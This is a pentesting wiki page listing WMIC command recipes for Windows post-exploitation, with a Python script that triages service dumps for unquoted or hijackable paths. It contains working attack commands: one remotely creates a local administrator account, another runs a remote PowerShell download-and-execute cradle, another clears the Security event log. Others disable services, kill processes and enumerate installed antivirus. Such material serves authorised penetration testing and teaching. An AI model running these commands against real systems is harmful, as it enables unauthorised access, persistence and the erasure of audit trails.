From BHaFSec Pentesting Notes Wiki

Add Admin User Remotely

wmic /node:[IP address] /user:"[user name]" /password:"[password]" process call create "cmd /c c:\Windows\System32\net.exe user [new user] [new password] /add && c:\Windows\System32\net.exe localgroup administrators [new user] /add"

The supplied credentials need local admin on the target. wmic only reports the ProcessId and a ReturnValue (0 = process started); it does not relay net.exe's output, so confirm afterwards with wmic /node:[IP address] /user:"[user name]" /password:"[password]" useraccount get name.

Find all AD accounts whose password is set to never expire:

wmic UserAccount where "PasswordExpires=False" get Name,Domain

Run this on a domain controller (or point it at one with /node:[DC]) to get the domain accounts. On a domain member Win32_UserAccount returns the local accounts plus whatever domain accounts the box can enumerate, which is slow on a large domain.

From a Windows command prompt spawned with "shell" in Meterpreter, use WMIC to remotely execute a PowerShell command that downloads and runs a PowerShell script:

wmic /User:"Domain\User" /Password:"thepasswordlol" /Node:"" process call create "powershell.exe -exec bypass -nop -c \"IEX (New-Object Net.WebClient).DownloadString('');\""

List services running as SYSTEM & possibly weak file perms:

wmic service where "StartName='LocalSystem'" get Name,PathName,StartMode | findstr /IV ":\WIN :\PROG"

The findstr drops anything under \Windows and \Program Files, leaving third-party services whose binary or parent directory may be writable by a low-privileged user; check the survivors with icacls "[path]".

List unquoted service paths

wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """
wmic service get name,startmode,pathname | findstr /i /v ":\windows\\" | findstr /v """

These only drop quoted paths and anything under \Windows. A hit is exploitable when the unquoted path has a space in a directory you can write to: for C:\Program Files\Vendor Tools\agent.exe Windows tries C:\Program.exe and then C:\Program Files\Vendor.exe before the real binary, so check the hits for spaces and the ACLs of those directories with icacls.
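The two service checks above (SYSTEM services outside the standard directories, and unquoted paths) as one offline triage script. This is an added example, not code from the original wiki: it parses a dump taken with wmic service get Name,PathName,StartMode,StartName /format:csv and, beyond what the findstr pipelines do, tells quoted from unquoted paths correctly and lists the exact files CreateProcess would probe. The sample rows, host name WS01 and service names are constructed for the demonstration.

```python
import re

# Constructed sample in the shape of
#   wmic service get Name,PathName,StartMode,StartName /format:csv
# wmic prepends a Node column and a blank line, and writes any quotes in
# PathName verbatim (they are not CSV-escaped). Not captured from a real host.
SAMPLE_WMIC_CSV = r"""
Node,Name,PathName,StartMode,StartName
WS01,Spooler,C:\Windows\System32\spoolsv.exe,Auto,LocalSystem
WS01,VendorAgent,C:\Program Files\Vendor Tools\agent.exe -svc,Auto,LocalSystem
WS01,BackupSvc,"C:\Program Files\Backup Co\backup.exe",Auto,LocalSystem
WS01,LegacyUpd,C:\Tools\Legacy Updater\upd.exe,Manual,NT AUTHORITY\LocalService
WS01,CustomMon,C:\CustomApps\mon.exe,Auto,LocalSystem
"""

EXPECTED_HEADER = ["Node", "Name", "PathName", "StartMode", "StartName"]


def parse_wmic_csv(text):
    """Parse wmic /format:csv output into dicts.

    A plain csv.reader would strip the quotes around PathName, which is the
    very thing the unquoted-path check needs, so lines are split by hand:
    Node and Name from the left, StartMode and StartName from the right,
    and everything in between (commas included) is PathName.
    """
    rows = []
    header_seen = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split(",")
        if not header_seen:
            if parts != EXPECTED_HEADER:
                raise ValueError("unexpected column layout: %r" % line)
            header_seen = True
            continue
        if len(parts) < 5:
            continue
        rows.append({
            "Node": parts[0],
            "Name": parts[1],
            "PathName": ",".join(parts[2:-2]),
            "StartMode": parts[-2],
            "StartName": parts[-1],
        })
    return rows


def unquoted_path_candidates(pathname):
    r"""Return the files CreateProcess would try before the real binary.

    An empty list means the path is quoted or has no space in the executable
    part, so it is not hijackable this way. For
    C:\Program Files\Vendor Tools\agent.exe -svc the candidates are
    C:\Program.exe and C:\Program Files\Vendor.exe.
    """
    path = pathname.strip()
    if path.startswith('"'):
        return []
    # The executable part ends at the first ".exe"; the rest is arguments.
    m = re.match(r"(.*?\.exe)", path, re.IGNORECASE)
    exe = m.group(1) if m else path
    candidates = []
    pos = exe.find(" ")
    while pos != -1:
        candidates.append(exe[:pos] + ".exe")
        pos = exe.find(" ", pos + 1)
    return candidates


def triage_services(rows):
    r"""Flag services worth a second look.

    'unquoted-path'           unquoted binary path containing a space
    'nonstandard-system-path' runs as LocalSystem from outside \Windows and
                              \Program Files (check the ACLs with icacls)
    """
    findings = []
    for r in rows:
        path = r["PathName"]
        cands = unquoted_path_candidates(path)
        if cands:
            findings.append((r["Name"], "unquoted-path", cands))
        low = path.lower().lstrip('"')
        standard = ":\\windows\\" in low or ":\\program files" in low
        if r["StartName"].lower() == "localsystem" and not standard:
            findings.append((r["Name"], "nonstandard-system-path", path))
    return findings


if __name__ == "__main__":
    for name, kind, detail in triage_services(parse_wmic_csv(SAMPLE_WMIC_CSV)):
        print("%-12s %-24s %s" % (name, kind, detail))
```

Dump the real data on the target with wmic service get Name,PathName,StartMode,StartName /format:csv > svc.csv, pull the file back over Meterpreter and feed it to parse_wmic_csv; every unquoted-path finding still has to be confirmed by checking write access to the directory of each candidate file.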

List Which Antivirus is installed

wmic.exe /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get *
wmic /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathtoSignedProductExe

The SecurityCenter2 namespace exists only on client editions of Windows; on Windows Server the query fails with an invalid-namespace error, so check the service list or installed products there instead.

List autoruns

wmic startup list full
wmic startup list brief | find /i "hklm"

Get MAC Address

wmic nic get macaddress

Clear Event Log

wmic nteventlog where (description like "%secevent%") call cleareventlog

"secevent" matches the SecEvent.Evt file name used up to XP/2003. On Vista and later the file is Security.evtx, so match on the log name instead: wmic nteventlog where "LogfileName='Security'" call cleareventlog. Clearing the Security log is itself recorded as event ID 1102, so it is not silent.

total number of logons for user

wmic netlogin where (name like "%skodo") get numberoflogons

Service Changing

wmic service where (name like "Fax" OR name like "Alerter") CALL ChangeStartMode Disabled

Check Machines for patches

wmic /node:box.domain.com qfe get description,hotfixid,installedon

Add a where clause to narrow the list, e.g. wmic /node:box.domain.com qfe where "not description like '%[pattern]%'" get description,hotfixid,installedon

Check for disabled accounts

wmic USERACCOUNT WHERE "Disabled=1 AND LocalAccount=1" GET Name

Use Disabled=0 instead to list the enabled local accounts.

kill process

wmic process where name='cmd.exe' delete
wmic process where processid=[pid] delete

Account info

wmic useraccount